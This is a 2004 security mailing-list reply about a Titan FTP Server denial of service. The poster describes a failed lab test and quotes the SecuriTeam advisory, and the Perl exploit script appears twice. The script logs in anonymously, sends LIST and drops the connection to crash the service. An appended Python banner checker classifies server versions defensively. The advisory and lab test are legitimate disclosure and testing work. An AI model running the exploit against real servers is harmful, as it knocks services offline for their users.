Re: Titan FTP Server Aborted LIST DoS

From: Gene Ken (gkenvip.sina.com)
Date: Thu May 06 2004 - 21:19:59 CDT


Hi Aviram,

   I have some trouble with testing the current exploit; below
is my test procedure:

1) In my test bed, the host side is winxp professional with ip_addr 192.168.0.2
   (english, 5.1 build 2600), and the client side is redhat linux 9 using NAT in
   Vmware Workstation 4.5.1 build-7568 with ip_addr 192.168.92.3.

2) I have successfully installed Titan Ftp Server v3.01 Build 163 on the Winxp Pro
    platform. Also, the perl script u mentioned in ur article has successfully
    executed, as below:

/* on my redhat box, i use ftp to verify if the titan ftp server is running,
    the result is the info as below: */

[gkenrh9 gken]$ ftp 192.168.0.2
Connected to 192.168.0.2 (192.168.0.2).
220 Titan FTP Server 3.01.163 Ready.
Name (192.168.0.2:gken): gken
331 User name okay, need password.
Password:
230-Welcome gken from 192.168.0.2. You are now logged in to the server.
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.

/* executing titan.pl script */
[gkenrh9 gken]$ perl titan.pl
Combination:
cannot connect to ftp daemon on 192.168.0.2 at titan.pl line 22.

    how to tackle this? thx in advance!

---the titan.pl---
  #!/usr/bin/perl
  # Test for Titan FTP server security vulnerability
  #
  # Orkut users? Come join the SecuriTeam community
  # http://www.orkut.com/Community.aspx?cmm=44441
  #
  use IO::Socket;

  $host = "192.168.0.2";

  my @combination;
  $combination[0] = "LIST \r\n";

  for (my $i = 0; $combination[$i] ; $i++)
  {
   print "Combination: $1\n";

   $remote = IO::Socket::INET->new ( Proto => "tcp",
       PeerAddr => $host,
       PeerPort => "2112",
       );
   unless ($remote) { die "cannot connect to ftp daemon on $host" }

   print "connected\n";
   while (<$remote>)
   {
    print $_;
    if (/220 /)
    {
     last;
    }
   }

   $remote->autoflush(1);

   my $ftp = "USER anonymous\r\n";

   print $remote $ftp;
   print $ftp;

   while (<$remote>)
   {
    print $_;
    if (/331 /)
    {
     last;
    }
   }

   $ftp = "PASS a\b.com\r\n";
   print $remote $ftp;
   print $ftp;

   while (<$remote>)
   {
    print $_;
    if (/230 /)
    {
     last;
    }
   }

   $ftp = $combination[$i];

   print $remote $ftp;
   print $ftp;

   while (<$remote>)
   {
    print $_;
    if (/150 /)
    {
     last;
    }

   close $remote;
  }
}

At 05:51 AM 5/5/2004, you wrote:
> Titan FTP Server Aborted LIST DoS
>----------------------------------------------------
>
>
>Article reference:
>http://www.securiteam.com/windowsntfocus/5RP0215CUU.html
>
>
>SUMMARY
>
>A security vulnerability exists in South River Technologies' Titan FTP
>Server.
>An attacker issuing a LIST command and disconnecting before the LIST command
>had the time to connect, will cause the program to try and access an invalid
>socket. This will result in the FTP service's crash (and in turn, no longer
>being able to service any additional users).
>
>
>DETAILS
>
>Vulnerable Systems:
> * Titan FTP Server version 3.01 build 163
>
> Immune Systems:
> * Titan FTP Server version 3.10 build 169
>
> Solution:
> To solve this issue upgrade to the latest version (3.10 build 169 or newer).
>
> Exploit:
> #!/usr/bin/perl
> # Test for Titan FTP server security vulnerability
> #
> # Orkut users? Come join the SecuriTeam community
> # http://www.orkut.com/Community.aspx?cmm=44441
> #
> use IO::Socket;
>
> $host = "192.168.1.243";
>
> my @combination;
> $combination[0] = "LIST \r\n";
>
> for (my $i = 0; $combination[$i] ; $i++)
> {
> print "Combination: $1\n";
>
> $remote = IO::Socket::INET->new ( Proto => "tcp",
> PeerAddr => $host,
> PeerPort => "2112",
> );
> unless ($remote) { die "cannot connect to ftp daemon on $host" }
>
> print "connected\n";
> while (<$remote>)
> {
> print $_;
> if (/220 /)
> {
> last;
> }
> }
>
> $remote->autoflush(1);
>
> my $ftp = "USER anonymous\r\n";
>
> print $remote $ftp;
> print $ftp;
>
> while (<$remote>)
> {
> print $_;
> if (/331 /)
> {
> last;
> }
> }
>
> $ftp = "PASS a\b.com\r\n";
> print $remote $ftp;
> print $ftp;
>
> while (<$remote>)
> {
> print $_;
> if (/230 /)
> {
> last;
> }
> }
>
> $ftp = $combination[$i];
>
> print $remote $ftp;
> print $ftp;
>
> while (<$remote>)
> {
> print $_;
> if (/150 /)
> {
> last;
> }
>
>
> close $remote;
> }
>
>
>ADDITIONAL INFORMATION
>
>SecuriTeam would like to thank STORM for
>finding this vulnerability.
>
>
>
>
>Regards,
>Aviram Jenik
>Beyond Security Ltd.
>
>http://www.BeyondSecurity.com
>http://www.SecuriTeam.com
>
>DISCLAIMER:
>The information in this bulletin is provided "AS IS" without warranty of any
>kind.
>In no event shall we be liable for any damages whatsoever including direct,
>indirect, incidental, consequential, loss of business profits or special
>damages.

Regards,

Gene Ken
86-10-62928315 (Home)
86-13901016339 (Cell)
/* Out of intense complexities, emerge intense simplicities. */
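
For administrators who need to tell whether a Titan FTP Server instance is still on the affected build, the following is an added example (not part of the original post or of the SecuriTeam advisory) that classifies a server from its 220 greeting, using the version numbers given in the advisory. It assumes fixed builds announce themselves in the same greeting format as the one shown in the session transcript above; the function names are illustrative.

```python
import re
import socket

# Versions taken from the advisory quoted above.
CONFIRMED_VULNERABLE = (3, 1, 163)   # "version 3.01 build 163"
FIRST_FIXED = (3, 10, 169)           # "version 3.10 build 169"

# Greeting format as shown in the session transcript above:
#   220 Titan FTP Server 3.01.163 Ready.
BANNER_RE = re.compile(r"^220[ -]Titan FTP Server (\d+)\.(\d+)\.(\d+)\b", re.M)


def parse_banner(greeting):
    """Return (major, minor, build) from a Titan greeting, or None."""
    m = BANNER_RE.search(greeting)
    return tuple(int(g) for g in m.groups()) if m else None


def classify(greeting):
    """Map a greeting to 'fixed', 'vulnerable', 'upgrade' or 'unknown'."""
    version = parse_banner(greeting)
    if version is None:
        return "unknown"          # not Titan, or the banner was customised
    if version >= FIRST_FIXED:    # numeric compare, so 3.10 sorts above 3.01
        return "fixed"
    if version == CONFIRMED_VULNERABLE:
        return "vulnerable"
    return "upgrade"              # older than the fixed build; status not stated


def fetch_greeting(host, port=21, timeout=5.0):
    """Read only the server greeting; no login or commands are sent."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return s.recv(1024).decode("ascii", "replace")


if __name__ == "__main__":
    # Constructed sample greetings; the first is the one shown in the post.
    for sample in ("220 Titan FTP Server 3.01.163 Ready.\r\n",
                   "220 Titan FTP Server 3.10.169 Ready.\r\n",
                   "220 ProFTPD Server ready.\r\n"):
        print(sample.strip(), "->", classify(sample))
```

A result of "unknown" only means the greeting did not match; a customised banner says nothing about the installed build, so confirm the version on the host itself in that case.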